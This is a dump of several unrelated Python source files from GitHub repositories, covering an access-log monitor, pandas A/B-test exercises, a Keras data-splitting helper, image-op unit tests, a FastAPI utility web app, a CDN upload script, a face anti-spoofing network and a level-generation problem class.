analyze\n \"\"\"\n all_aggregates: dict[int, AccessLogAggregate] = {}\n for agg in aggregates:\n bucket = agg.bucket - agg.bucket % bucket_size_seconds\n\n if bucket not in all_aggregates:\n all_aggregates[bucket] = AccessLogAggregate(bucket_size_seconds, bucket)\n all_aggregates[bucket].add(agg)\n\n # handle out-of-order arrival by closing aggregates that haven't gotten new data in a while\n for _, aggregate in all_aggregates.items():\n if (\n not aggregate.is_closed\n and agg.bucket > aggregate.latest_time_before_close\n and aggregate.bucket_size_seconds != 0\n ):\n aggregate.close()\n\n # free the memory occupied by closed aggregates\n all_aggregates = {k: v for k, v in all_aggregates.items() if not v.is_closed}\n\n yield agg\n\n\ndef parse_args():\n parser = argparse.ArgumentParser(\n description=\"Monitor and analyze a CSV HTTP access log. \"\n \"Simulates delayed event arrival with time.sleep.\"\n )\n parser.add_argument(\n \"input_file\",\n type=str,\n help=\"CSV file from which to read log\",\n )\n parser.add_argument(\n \"--alert-threshold\",\n \"-a\",\n type=float,\n default=10.0,\n help=\"Average requests per second during the monitoring window above which to alert. Defaults to 10.\",\n )\n parser.add_argument(\n \"--alert-window\",\n \"-w\",\n type=int,\n default=120,\n help=\"The size in seconds of the rolling window over which alerts are evaluated. Defaults to 120.\",\n )\n parser.add_argument(\n \"--analysis-bucket-size\",\n \"-b\",\n type=int,\n default=10,\n help=\"The size in seconds of the aggregation buckets in which alerts are analyzed. Defaults to 10.\",\n )\n parser.add_argument(\n \"--verbose\",\n \"-v\",\n action=\"store_true\",\n help=\"Enable verbose logging\",\n )\n parser.add_argument(\n \"--timescale\",\n \"-t\",\n type=float,\n default=0,\n help=\"How fast events should play back. Set between 0 and 1 for faster playback, above 1 for slower. \"\n \"Defaults to 0 (no playback delay)\",\n )\n return parser.parse_args()\n\n\ndef section_from_request(request: str) -> str:\n \"\"\"Given a request string from an access log, return the section name\"\"\"\n return f\"/{request.split()[1].split('/')[1]}\"\n\n\ndef exhaust(generator: Generator):\n \"\"\"Consume the given generator using a minimum of resources\"\"\"\n deque(generator, maxlen=0)\n\n\ndef main():\n \"\"\"Analyze and monitor an HTTP access log. See --help for more details.\"\"\"\n args = parse_args()\n logging.basicConfig(level=logging.DEBUG if args.verbose else logging.INFO)\n\n events = read_access_log(args.input_file, args.timescale)\n events = aggregate_stats(events, args.analysis_bucket_size)\n events = AccessLogMonitor(events, args.alert_window, args.alert_threshold).run()\n exhaust(events)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"emmettbutler/ctci","sub_path":"http_log_analysis/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":13198,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"70673312324","text":"import codecademylib\nimport pandas as pd\n\nad_clicks = pd.read_csv('ad_clicks.csv')\n\nby_source = ad_clicks.groupby('utm_source').user_id.count().reset_index()\n\nad_clicks['is_click'] = ~ad_clicks.ad_click_timestamp.isnull()\n\nclicks_by_source = ad_clicks.groupby(['utm_source', 'is_click']).user_id.count().reset_index()\n\nclicks_pivot = clicks_by_source.pivot(\n columns = 'is_click',\n index = 'utm_source',\n values = 'user_id'\n).reset_index()\n\nclicks_pivot['percent_clicked'] = clicks_pivot[True] / (clicks_pivot[True] + clicks_pivot[False])\n\na_b = ad_clicks.groupby(['experimental_group', 'is_click']).user_id.count().reset_index()\n\na_b_pivot = a_b.pivot( \n columns = 'is_click', \n index = 'experimental_group', \n values = 'user_id'\n).reset_index()\n\na_b_pivot['percentage'] = a_b_pivot[True] / (a_b_pivot[True] + a_b_pivot[False])\n\na_b_clicks = ad_clicks.groupby(['experimental_group', 'is_click']).user_id.count().reset_index()\n\na_clicks = ad_clicks[ad_clicks.experimental_group == 'A']\n\nb_clicks = ad_clicks[ad_clicks.experimental_group == 'B']\n\na_clicks_by_day = a_clicks.groupby(['day', 'is_click']).user_id.count().reset_index()\n\nb_clicks_by_day = b_clicks.groupby(['day', 'is_click']).user_id.count().reset_index()\n\na_clicks_pivot = a_clicks_by_day.pivot(\n columns = 'is_click',\n index = 'day',\n values = 'user_id'\n).reset_index()\n\nb_clicks_pivot = b_clicks_by_day.pivot(\n columns = 'is_click',\n index = 'day',\n values = 'user_id'\n).reset_index()\n\na_clicks_pivot['percentage'] = a_clicks_pivot[True] / (a_clicks_pivot[True] + a_clicks_pivot[False]) \n\nb_clicks_pivot['percentage'] = b_clicks_pivot[True] / (b_clicks_pivot[True] + b_clicks_pivot[False])\n\nprint(a_clicks_pivot)\nprint(b_clicks_pivot)","repo_name":"galangjati/data-science-codecademy","sub_path":"lesson_code/ab_testing/ab_testing.py","file_name":"ab_testing.py","file_ext":"py","file_size_in_byte":1712,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"4218377231","text":"import numpy as np\nfrom keras.models import Sequential\nfrom keras.layers import Dense, LSTM\n\n# 1. 데이터\na = np.array(range(1, 11)) # 1~ 10 : \nsize = 5\n\ndef split_x(seq, size):\n aaa = [] # 는 리스트\n for i in range(len(seq) - size + 1):\n subset = seq[i : (i+size)]\n aaa.append([item for item in subset]) # item for item in subset = 굳이 안넣고 subset 하면 간단.\n print(type(aaa))\n return np.array(aaa)\n\ndataset = split_x(a, size)\nprint(\"==============\")\nprint(dataset)\n\n# split_x(seq, size) 아래보면, dataset = split_x(a, size) 로 정의되었고\n# a = seq임을 확인,\n# for i in range(6) : range(6) = 0,1,2,3,4,5 = i\n# subset = seq[0:(0+5)] = seq[0:5] = 0 ~ 4 = 1,2,3,4,5\n# aaa.append([item]) = 1,2,3,4,5 = aaa\n# aaa = 12345, \n\n# 1:6 = 1~5 = 2,3,4,5,6\n# 2:7 = 2~6 = 3,4,5,6,7\n# 3:8 = 3~7 = 4,5,6,7,8\n# 4:9 = 4~8 = 5,6,7,8,9\n# 5:10 = 5~9 = 6,7,8,9,10\n\n\n# def split_x(seq, size):\n# aaa = []\n# for i in range(len(a) - size + 1):\n# subset = a[i : (i + size)]\n# print(subset)\n# # aaa.append([item for item in subset])\n# aaa.append(subset)\n# print(type(aaa))\n# return np.array(aaa) \n","repo_name":"khiljaekang/git-study","sub_path":"keras/keras39_split.py","file_name":"keras39_split.py","file_ext":"py","file_size_in_byte":1182,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"20001911917","text":"# -*- coding:utf8 -*-\n# File : test_nn_opr_imgproc.py\n# Author : Jiayuan Mao\n# Email : maojiayuan@gmail.com\n# Date : 10/10/17\n#\n# This file is part of TensorArtist.\n\nfrom tartist.nn import Env, opr as O\n\nimport numpy as np\nimport unittest\nimport functools\n\n\ndef wraps_new_env(func):\n @functools.wraps(func)\n def new_func(*args, **kwargs):\n with Env().as_default():\n return func(*args, **kwargs)\n return new_func\n\n\nclass TestNNOprImgproc(unittest.TestCase):\n @functools.wraps(np.allclose)\n def assertTensorClose(self, *args, **kwargs):\n return self.assertTrue(np.allclose(*args, **kwargs))\n\n @wraps_new_env\n def testCropCenter(self):\n a = O.placeholder('a', shape=(16, 17, 17, 3))\n b = O.crop_center(a, [15, 15])\n self.assertTupleEqual(b.static_shape, (16, 15, 15, 3))\n\n avar = np.random.normal(size=(16, 17, 17, 3))\n bvar = avar[:, 1:-1, 1:-1, :]\n self.assertTensorClose(b.eval(a=avar), bvar)\n\n @wraps_new_env\n def testCropLU(self):\n a = O.placeholder('a', shape=(16, 17, 17, 3))\n b = O.crop_lu(a, [15, 15])\n self.assertTupleEqual(b.static_shape, (16, 15, 15, 3))\n\n avar = np.random.normal(size=(16, 17, 17, 3))\n bvar = avar[:, :-2, :-2, :]\n self.assertTensorClose(b.eval(a=avar), bvar)\n\n @wraps_new_env\n def testPaddingCenter(self):\n a = O.placeholder('a', shape=(16, 15, 15, 3))\n b = O.pad_center(a, [17, 17])\n self.assertTupleEqual(b.static_shape, (16, 17, 17, 3))\n\n avar = np.random.normal(size=(16, 15, 15, 3))\n bvar = np.pad(avar, [[0, 0], [1, 1], [1, 1], [0, 0]], mode='constant')\n self.assertTensorClose(b.eval(a=avar), bvar)\n\n @wraps_new_env\n def testPaddingRB(self):\n a = O.placeholder('a', shape=(16, 15, 15, 3))\n b = O.pad_rb(a, [16, 16])\n self.assertTupleEqual(b.static_shape, (16, 16, 16, 3))\n\n avar = np.random.normal(size=(16, 15, 15, 3))\n bvar = np.pad(avar, [[0, 0], [0, 1], [0, 1], [0, 0]], mode='constant')\n self.assertTensorClose(b.eval(a=avar), bvar)\n\n @wraps_new_env\n def testPaddingRBMultiple(self):\n a = O.placeholder('a', shape=(16, 15, 15, 3))\n b = O.pad_rb_multiple_of(a, 8)\n self.assertTupleEqual(b.static_shape, (16, 16, 16, 3))\n\n avar = np.random.normal(size=(16, 15, 15, 3))\n bvar = np.pad(avar, [[0, 0], [0, 1], [0, 1], [0, 0]], mode='constant')\n self.assertTensorClose(b.eval(a=avar), bvar)\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"vacancy/TensorArtist","sub_path":"tests/test_nn_opr_imgproc.py","file_name":"test_nn_opr_imgproc.py","file_ext":"py","file_size_in_byte":2559,"program_lang":"python","lang":"en","doc_type":"code","stars":47,"dataset":"github-code","pt":"99"} +{"seq_id":"14452022282","text":"# conding:utf-8\nimport base64\nimport os\nimport tempfile\nfrom random import randint\n\nimport openai\nimport qrcode\nimport requests\nfrom fastapi import APIRouter, Depends, Form, UploadFile\nfrom fastapi import Request\nfrom starlette import status\nfrom starlette.responses import RedirectResponse, FileResponse\nfrom starlette.templating import Jinja2Templates\n\nimport config.main\nfrom common.render_template import get_template\nfrom utils.ocr_util import OcrClient\n\n# main的分路由\ntemplates = Jinja2Templates(directory=\"router/templates\")\nmain_app = APIRouter()\n\n\n@main_app.get('/')\n@main_app.get('/index')\n@main_app.get('/qrcode/')\nasync def test(result: dict = Depends(get_template)):\n result['data'] = 'hello'\n return templates.TemplateResponse(\"index.html\", result)\n\n\n# @main_app.get(\"/favicon.ico\")\n# async def read_item():\n# return RedirectResponse('/static/favicon.ico')\n\n\n@main_app.get('/list/')\nasync def list_header(request: Request, result: dict = Depends(get_template)):\n result['session'] = request.headers\n return templates.TemplateResponse('list.html', result)\n\n\n@main_app.get('/wiki/')\nasync def wiki(dic: dict = Depends(get_template)):\n return templates.TemplateResponse(\"wiki.html\", dic)\n\n\n@main_app.post('/wiki/')\nasync def wiki(url: str = Form(), dic: dict = Depends(get_template)):\n key = config.main.AI_KEY\n r_key = base64.b64decode(key).decode(\"utf-8\")\n openai.api_key = r_key\n response = openai.Image.create(prompt=url, n=1, size=\"1024x1024\")\n image_url = response[\"data\"][0][\"url\"]\n dic[\"path\"] = image_url\n return templates.TemplateResponse(\"aipic.html\", dic)\n\n\n@main_app.post('/qrcode/')\nasync def qrcodelike(url: str = Form(), result: dict = Depends(get_template)):\n img_name = randint(1, 1000000)\n imge = qrcode.make(url)\n pa = 'static' + os.sep + 'qrcode' + os.sep + str(img_name) + \".png\"\n print(pa)\n imge.save(pa)\n result['img'] = img_name\n return templates.TemplateResponse('qrcode.html', result)\n\n\n@main_app.get('/upload/')\nasync def upload_get(dic: dict = Depends(get_template)):\n return templates.TemplateResponse('upload.html', dic)\n\n\n@main_app.post('/upload/')\nasync def upload_post(file: UploadFile):\n file_name = file.filename\n print(file_name)\n file_path = 'static' + os.sep + 'videos' + os.sep + file_name\n with open(file_path, \"wb\") as f:\n f.write(file.file.read())\n return RedirectResponse(url='/file/', status_code=status.HTTP_302_FOUND)\n\n\n@main_app.get('/file/')\nasync def file_list(dic=Depends(get_template)):\n li_file = []\n video_path = 'static' + os.sep + 'videos'\n for path, dir, file in os.walk(video_path):\n for i in file:\n li_file.append(i)\n dic['files'] = li_file\n return templates.TemplateResponse('file.html', dic)\n\n\n@main_app.get('/download/{filename}/')\ndef download_file(filename):\n video_path = 'static' + os.sep + 'qrcode' + os.sep + filename\n print(filename)\n respons = FileResponse(video_path, filename=filename)\n return respons\n\n\n@main_app.get('/downloadfile/{filename}/')\ndef download_file(filename):\n video_path = 'static' + os.sep + 'videos' + os.sep + filename\n print(filename)\n respons = FileResponse(video_path, filename=filename)\n return respons\n\n\n@main_app.get('/zhuang/')\ndef dazhuang(dic: dict = Depends(get_template)):\n return templates.TemplateResponse('zhuang.html', dic)\n\n\n@main_app.route('/ip/')\ndef get_ip():\n my_ip = requests.get('http://jsonip.com').json()['ip']\n return my_ip\n\n\n@main_app.get('/ocr/')\ndef ocr_get(dic: dict = Depends(get_template)):\n return templates.TemplateResponse('ocr.html', dic)\n\n\n@main_app.post('/ocr/')\ndef ocr_post(file: UploadFile,dic = Depends(get_template)):\n file_name = file.filename\n tempfile_path = tempfile.gettempdir()\n file_tmp_path = os.path.join(tempfile_path, file_name)\n with open(file_tmp_path, 'wb') as f:\n f.write(file.file.read())\n oc = OcrClient()\n dic['content'] = str(oc.simple_ocr(file_tmp_path))\n return templates.TemplateResponse(\"ocr.html\",dic)\n\n\n@main_app.get('/invoice/')\ndef invoice_get(dic: dict = Depends(get_template)):\n return templates.TemplateResponse('invoice.html', dic)\n\n\n@main_app.post('/invoice/')\ndef invoice_post(file: UploadFile):\n file_name = file.filename\n tempfile_path = tempfile.gettempdir()\n file_tmp_path = os.path.join(tempfile_path, file_name)\n with open(file_tmp_path, 'wb') as f:\n f.write(file.file.read())\n oc = OcrClient()\n return str(oc.fapiao(file_tmp_path))\n","repo_name":"fisher335/fastapi-qrcode","sub_path":"router/MainController.py","file_name":"MainController.py","file_ext":"py","file_size_in_byte":4534,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"74287590085","text":"import os\nimport sys\nimport requests\n\ndef duplicates(lst, item):\n return [i for i, x in enumerate(lst) if x == item]\n\ndef main():\n filename = sys.argv[1]\n print(filename)\n \n with open(filename) as f:\n mapping = {}\n lines = f.readlines()\n count = 0\n for l in lines:\n mapping[count] = l\n count += 1\n \n print(mapping.keys())\n for i, line in mapping.items():\n base_address = sys.argv[2]\n for j in duplicates(line.split(), '1'):\n with open('./resources/' + str(j) + '.png', 'rb') as resource:\n address = base_address + ':808' + str(i) + \"/resource/\" + str(j)\n print(address)\n \n response = requests.put(\n address, \n files={'content': resource.read(), 'Content-Type': 'image/png'}\n )\n \n print(response)\n\n\nif __name__ == '__main__':\n main()\n \n \n ","repo_name":"Delebrith/AUI-content-delivery-network","sub_path":"environment/insert_by_config.py","file_name":"insert_by_config.py","file_ext":"py","file_size_in_byte":1056,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"38929919333","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom .pub_mod import *\ntorch.set_printoptions(threshold=np.inf)\n\n\nclass Discriminator(nn.Module):\n def __init__(self, max_iter):\n super(Discriminator, self).__init__()\n self.ad_net = nn.Sequential(\n nn.Conv2d(256, 256, kernel_size=3, stride=2, padding=1, bias=False),\n nn.BatchNorm2d(256),\n nn.LeakyReLU(0.2, inplace=True),\n nn.Conv2d(256, 512, kernel_size=3, stride=2, padding=1, bias=False),\n nn.BatchNorm2d(512),\n nn.LeakyReLU(0.2, inplace=True),\n nn.AvgPool2d(4, 4)\n )\n self.grl_layer = GRL(max_iter)\n self.fc = nn.Linear(512, 3)\n\n def forward(self, feature):\n adversarial_out = self.grl_layer(feature)\n adversarial_out = self.ad_net(adversarial_out).reshape(adversarial_out.shape[0], -1)\n adversarial_out = self.fc(adversarial_out)\n return adversarial_out\n\n\nclass SSAN_M(nn.Module):\n def __init__(self, ada_num=2, max_iter=4000):\n super(SSAN_M, self).__init__()\n self.conv1 = nn.Sequential(\n nn.Conv2d(3, 64, kernel_size=3, stride=1, padding=1, bias=False),\n nn.BatchNorm2d(64),\n nn.ReLU(inplace=True), \n )\n \n self.Block1 = nn.Sequential(\n nn.Conv2d(64, 128, kernel_size=3, stride=1, padding=1, bias=False),\n nn.BatchNorm2d(128),\n nn.ReLU(inplace=True), \n nn.Conv2d(128, 196, kernel_size=3, stride=1, padding=1, bias=False),\n nn.BatchNorm2d(196),\n nn.ReLU(inplace=True), \n nn.Conv2d(196, 128, kernel_size=3, stride=1, padding=1, bias=False),\n nn.BatchNorm2d(128),\n nn.ReLU(inplace=True), \n nn.MaxPool2d(kernel_size=3, stride=2, padding=1),\n )\n \n self.Block2 = nn.Sequential(\n nn.Conv2d(128, 128, kernel_size=3, stride=1, padding=1, bias=False),\n nn.BatchNorm2d(128),\n nn.ReLU(inplace=True), \n nn.Conv2d(128, 196, kernel_size=3, stride=1, padding=1, bias=False),\n nn.BatchNorm2d(196),\n nn.ReLU(inplace=True), \n nn.Conv2d(196, 128, kernel_size=3, stride=1, padding=1, bias=False),\n nn.BatchNorm2d(128),\n nn.ReLU(inplace=True), \n nn.MaxPool2d(kernel_size=3, stride=2, padding=1),\n )\n \n self.Block3 = nn.Sequential(\n nn.Conv2d(128, 128, kernel_size=3, stride=1, padding=1, bias=False),\n nn.BatchNorm2d(128),\n nn.ReLU(inplace=True),\n nn.Conv2d(128, 196, kernel_size=3, stride=1, padding=1, bias=False),\n nn.BatchNorm2d(196),\n nn.ReLU(inplace=True),\n nn.Conv2d(196, 128, kernel_size=3, stride=1, padding=1, bias=False),\n nn.BatchNorm2d(128),\n nn.ReLU(inplace=True), \n nn.MaxPool2d(kernel_size=3, stride=2, padding=1),\n )\n\n self.layer4 = nn.Sequential(\n nn.Conv2d(128, 256, kernel_size=3, stride=2, padding=1, bias=False),\n nn.BatchNorm2d(256),\n nn.ReLU(inplace=True)\n )\n\n self.adaIN_layers = nn.ModuleList([ResnetAdaINBlock(256) for i in range(ada_num)])\n\n self.conv_final = nn.Sequential(\n nn.Conv2d(256, 512, kernel_size=3, stride=2, padding=1, bias=False),\n nn.BatchNorm2d(512)\n )\n\n self.gamma = nn.Linear(256, 256, bias=False)\n self.beta = nn.Linear(256, 256, bias=False)\n \n self.FC = nn.Sequential(\n nn.Linear(256, 256, bias=False),\n nn.ReLU(inplace=True)\n )\n \n self.ada_conv1 = nn.Sequential(\n nn.Conv2d(128, 128, kernel_size=3, stride=2, padding=1, bias=False),\n nn.InstanceNorm2d(128),\n nn.ReLU(inplace=True)\n )\n \n self.ada_conv2 = nn.Sequential(\n nn.Conv2d(128, 128, kernel_size=3, stride=2, padding=1, bias=False),\n nn.InstanceNorm2d(128),\n nn.ReLU(inplace=True)\n )\n\n self.ada_conv3 = nn.Sequential(\n nn.Conv2d(128, 256, kernel_size=3, stride=2, padding=1, bias=False),\n nn.InstanceNorm2d(256)\n )\n self.dis = Discriminator(max_iter)\n\n self.decoder = nn.Sequential(\n nn.Upsample(scale_factor=2, mode='bilinear'),\n nn.Conv2d(512, 128, kernel_size=3, stride=1, padding=1, bias=False),\n nn.BatchNorm2d(128),\n nn.ReLU(inplace=True),\n\n nn.Upsample(scale_factor=2, mode='bilinear'),\n nn.Conv2d(128, 64, kernel_size=3, stride=1, padding=1, bias=False),\n nn.BatchNorm2d(64),\n nn.ReLU(inplace=True),\n\n nn.Conv2d(64, 1, kernel_size=3, stride=1, padding=1, bias=False),\n nn.ReLU(inplace=True)\n )\n\n def cal_gamma_beta(self, x1):\n x1 = self.conv1(x1)\n x1_1 = self.Block1(x1)\n x1_2 = self.Block2(x1_1)\n x1_3 = self.Block3(x1_2)\n\n x1_4 = self.layer4(x1_3)\n\n x1_add = x1_1\n x1_add = self.ada_conv1(x1_add)+x1_2\n x1_add = self.ada_conv2(x1_add)+x1_3\n x1_add = self.ada_conv3(x1_add)\n\n gmp = torch.nn.functional.adaptive_max_pool2d(x1_add, 1)\n gmp_ = self.FC(gmp.view(gmp.shape[0], -1))\n gamma, beta = self.gamma(gmp_), self.beta(gmp_)\n\n domain_invariant = x1_4\n return x1_4, gamma, beta, domain_invariant\n\n def forward(self, input1, input2):\n x1, gamma1, beta1, domain_invariant = self.cal_gamma_beta(input1)\n x2, gamma2, beta2, _ = self.cal_gamma_beta(input2)\n\n fea_x1_x1 = x1\n for i in range(len(self.adaIN_layers)):\n fea_x1_x1 = self.adaIN_layers[i](fea_x1_x1, gamma1, beta1)\n fea_x1_x1 = self.conv_final(fea_x1_x1)\n cls_x1_x1 = self.decoder(fea_x1_x1)\n \n fea_x1_x1 = torch.nn.functional.adaptive_avg_pool2d(fea_x1_x1, 1)\n fea_x1_x1 = fea_x1_x1.reshape(fea_x1_x1.shape[0], -1)\n\n fea_x1_x2 = x1\n for i in range(len(self.adaIN_layers)):\n fea_x1_x2 = self.adaIN_layers[i](fea_x1_x2, gamma2, beta2)\n fea_x1_x2 = self.conv_final(fea_x1_x2)\n fea_x1_x2 = torch.nn.functional.adaptive_avg_pool2d(fea_x1_x2, 1)\n fea_x1_x2 = fea_x1_x2.reshape(fea_x1_x2.shape[0], -1)\n\n dis_invariant = self.dis(domain_invariant).reshape(domain_invariant.shape[0], -1)\n return cls_x1_x1[:, 0, :, :], fea_x1_x1, fea_x1_x2, dis_invariant\n","repo_name":"wangzhuo2019/SSAN","sub_path":"networks/SSAN_M.py","file_name":"SSAN_M.py","file_ext":"py","file_size_in_byte":6539,"program_lang":"python","lang":"en","doc_type":"code","stars":79,"dataset":"github-code","pt":"99"} +{"seq_id":"33888899685","text":"from abc import ABC\nfrom pathlib import Path\nfrom pdb import set_trace as TT\n\nimport gymnasium as gym\nfrom gymnasium.utils import seeding\nimport numpy as np\nfrom PIL import Image\nfrom PIL import ImageDraw\nfrom PIL import ImageFont\n\nfrom control_pcgrl.configs.config import Config\n\nGVGAI_SPRITES = False\nPROB_DIR = str(Path(__file__).parent) # for convenience when loading sprite .pngs\n\n\"\"\"\nThe base class for all the problems that can be handled by the interface\n\nmap in prob are list of strings\n\"\"\"\nclass Problem(ABC):\n _tile_types = []\n eval_maps = []\n \"\"\"\n Constructor for the problem that initialize all the basic parameters. Abstract Base Class (ABS) that cannot be\n directly instantiated.\n \"\"\"\n def __init__(self, cfg: Config):\n self._map_shape = tuple(cfg.task.map_shape) # convert from omegaconf.listconfig.ListConfig to tuple\n self._height, self._width = self._map_shape[0], self._map_shape[1] # Will be overwritten if this is a 3D problem.\n tiles = self.get_tile_types()\n\n # How much to weight each component of the reward function (which is a linear sum).\n self._reward_weights = cfg.task.weights\n self._ctrl_reward_weights = cfg.task.weights # Can make this a separate config attribute later if necessary.\n\n # FIXME: assumption, will overrule a similar declaration by the child.\n self._empty_tile = tiles[0]\n\n self._wall_tile = tiles[1]\n\n self._prob = {}\n for tile in range(len(tiles)):\n self._prob.update({tile: 1.0 / len(tiles)})\n\n self._border_size = (1, 1)\n self._border_tile = tiles[0]\n if GVGAI_SPRITES:\n self._tile_size = 24\n self.GVGAI_SPRITES = True\n else:\n self._tile_size = 16\n self.GVGAI_SPRITES = False\n self._graphics = None\n self.render_path = cfg.render_mode is not None\n self.path_to_erase = set({}) # FIXME: only 3D really needs this.\n\n def init_tile_int_dict(self):\n \"\"\"Initialize a dictionary that maps tile names to integers.\"\"\"\n self._tile_int_dict = {tile: i for i, tile in enumerate(self.get_tile_types())}\n\n def get_tile_int(self, tile):\n return self._tile_int_dict[tile]\n\n\n def is_continuous(self):\n return False\n\n \"\"\"\n Seeding the used random variable to get the same result. If the seed is None,\n it will seed it with random start.\n\n Parameters:\n seed (int): the starting seed, if it is None a random seed number is used.\n \n Returns:\n int: the used seed (same as input if not None)\n \"\"\"\n def seed(self, seed=None):\n self._random, seed = seeding.np_random(seed)\n return seed\n\n \"\"\"\n Resets the problem to the initial state and save the start_stats from the starting map.\n Also, it can be used to change values between different environment resets\n\n Parameters:\n start_stats (dict(string,any)): the first stats of the map\n \"\"\"\n def reset(self, start_stats):\n self._start_stats = start_stats\n\n \"\"\"\n Get a list of all the different tile names\n\n Returns:\n string[]: that contains all the tile names\n \"\"\"\n def get_tile_types(self):\n return self._tile_types\n # raise NotImplementedError('get_tile_types is not implemented')\n\n \"\"\"\n Adjust the parameters for the current problem\n\n Parameters:\n width (int): change the width of the problem level\n height (int): change the height of the problem level\n probs (dict(string, float)): change the probability of each tile\n intiialization, the names are the same as the tile types from get_tile_types\n \"\"\"\n def adjust_param(self, cfg: Config):\n self._map_shape = tuple(cfg.task.map_shape) # convert from omegaconf.listconfig.ListConfig to tuple\n self._height, self._width = self._map_shape[0], self._map_shape[1] # Will be overwritten if this is a 3D problem.\n # prob = kwargs.get('probs')\n # if prob is not None:\n # for t in prob:\n # if t in self._prob:\n # self._prob[t] = prob[t]\n if self.render_path:\n # Make room for displaying path length\n self._border_size = (1, 2)\n else:\n self._border_size = (1, 1)\n\n \"\"\"\n Get the current stats of the map\n\n Returns:\n dict(string,any): stats of the current map to be used in the reward, episode_over, debug_info calculations\n \"\"\"\n def get_stats(self, map, **kwargs):\n raise NotImplementedError('get_graphics is not implemented')\n\n \"\"\"\n Get the current game reward between two stats\n\n Parameters:\n new_stats (dict(string,any)): the new stats after taking an action\n old_stats (dict(string,any)): the old stats before taking an action\n\n Returns:\n float: the current reward due to the change between the old map stats and the new map stats\n \"\"\"\n # def get_reward(self, new_stats, old_stats):\n # raise NotImplementedError('get_reward is not implemented')\n\n \"\"\"\n Uses the stats to check if the problem ended (episode_over) which means reached\n a satisfying quality based on the stats\n\n Parameters:\n new_stats (dict(string,any)): the new stats after taking an action\n old_stats (dict(string,any)): the old stats before taking an action\n\n Returns:\n boolean: True if the level reached satisfying quality based on the stats and False otherwise\n \"\"\"\n # def get_episode_over(self, new_stats, old_stats):\n # raise NotImplementedError('get_graphics is not implemented')\n\n \"\"\"\n Get any debug information need to be printed.\n\n Parameters:\n new_stats (dict(string,any)): the new stats after taking an action\n old_stats (dict(string,any)): the old stats before taking an action\n\n Returns:\n dict(any,any): is a debug information that can be used to debug what is\n happening in the problem\n \"\"\"\n def get_debug_info(self, new_stats, old_stats):\n raise NotImplementedError('get_debug_info is not implemented')\n\n def process_observation(self, observation):\n return observation\n\n def get_observable_tile_types(self):\n return self.get_tile_types()\n\n def init_grayscale_graphics(self):\n render_path = True\n tiles = self.get_tile_types()\n self._graphics = {}\n for i in range(len(tiles)):\n color = i * 255 // len(tiles), i * 255 // len(tiles), i * 255 // len(tiles), 255\n self._graphics[tiles[i]] = Image.new(\"RGBA\", (self._tile_size, self._tile_size), color)\n if render_path:\n self._graphics[\"path\"] = Image.new(\"RGBA\", (self._tile_size, self._tile_size), color)\n\n \"\"\"\n Get an image on how the map will look like for a specific map\n\n Parameters:\n map (string[][]): the current game map\n\n Returns:\n Image: a pillow image on how the map will look like using the problem\n graphics or default grey scale colors\n \"\"\"\n def render(self, map, render_path=None):\n if self._graphics == None:\n self.init_grayscale_graphics()\n\n full_width = len(map[0])+2*self._border_size[0]\n full_height = len(map)+2*self._border_size[1]\n lvl_image = Image.new(\"RGBA\", (full_width*self._tile_size, full_height*self._tile_size), (0,0,0,255))\n\n # Background floor everywhere\n for y in range(full_height):\n for x in range(full_width):\n lvl_image.paste(self._graphics['empty'], (x*self._tile_size, y*self._tile_size, (x+1)*self._tile_size, (y+1)*self._tile_size))\n\n # Borders\n for y in range(full_height):\n for x in range(self._border_size[0]):\n lvl_image.paste(self._graphics[self._border_tile], (x*self._tile_size, y*self._tile_size, (x+1)*self._tile_size, (y+1)*self._tile_size))\n lvl_image.paste(self._graphics[self._border_tile], ((full_width-x-1)*self._tile_size, y*self._tile_size, (full_width-x)*self._tile_size, (y+1)*self._tile_size))\n for x in range(full_width):\n for y in range(self._border_size[1]):\n lvl_image.paste(self._graphics[self._border_tile], (x*self._tile_size, y*self._tile_size, (x+1)*self._tile_size, (y+1)*self._tile_size))\n lvl_image.paste(self._graphics[self._border_tile], (x*self._tile_size, (full_height-y-1)*self._tile_size, (x+1)*self._tile_size, (full_height-y)*self._tile_size))\n\n # Map tiles\n for y in range(len(map)):\n for x in range(len(map[y])):\n tile_image = self._graphics[map[y][x]]\n lvl_image.paste(self._graphics[map[y][x]], ((x+self._border_size[0])*self._tile_size, (y+self._border_size[1])*self._tile_size, (x+self._border_size[0]+1)*self._tile_size, (y+self._border_size[1]+1)*self._tile_size), mask=tile_image)\n\n # Path, if applicable\n if render_path is not None and self.render_path:\n tile_graphics = self._graphics[\"path\"]\n for (y, x) in render_path:\n lvl_image.paste(tile_graphics, ((x + self._border_size[0]) * self._tile_size, (y + self._border_size[1]) * self._tile_size, (x + self._border_size[0] + 1) * self._tile_size, (y + self._border_size[1] + 1) * self._tile_size), mask=tile_graphics)\n draw = ImageDraw.Draw(lvl_image)\n # font = ImageFont.truetype(, )\n font_size = 32\n try:\n font = ImageFont.truetype(\"arial.ttf\", font_size)\n except OSError:\n try:\n font = ImageFont.truetype(\"LiberationMono-Regular.ttf\", font_size)\n except OSError:\n font = ImageFont.truetype(\"SFNSMono.ttf\", 32)\n # draw.text((x, y),\"Sample Text\",(r,g,b))\n draw.text(((full_width - 1) * self._tile_size / 2, 0),\"{}\".format(self.path_length),(255,255,255),font=font)\n return lvl_image\n\n def get_episode_over(self, new_stats, old_stats):\n \"\"\" If the generator has reached its targets. (change percentage and max iterations handled in pcgrl_env)\"\"\"\n\n return False\n\n def get_reward(self, new_stats, old_stats):\n return None\n\n\nclass Problem3D(Problem):\n def __init__(self, cfg: Config):\n super().__init__(cfg)\n self._height, self._width, self._length = cfg.task.map_shape","repo_name":"smearle/control-pcgrl","sub_path":"control_pcgrl/envs/probs/problem.py","file_name":"problem.py","file_ext":"py","file_size_in_byte":10414,"program_lang":"python","lang":"en","doc_type":"code","stars":36,"dataset":"github-code","pt":"99"} +{"seq_id":"22690252212","text":"# wyszukiwanie i-tego co do kolejnosci elementu (w szczegolnosci mediany) O(n)\n\ndef 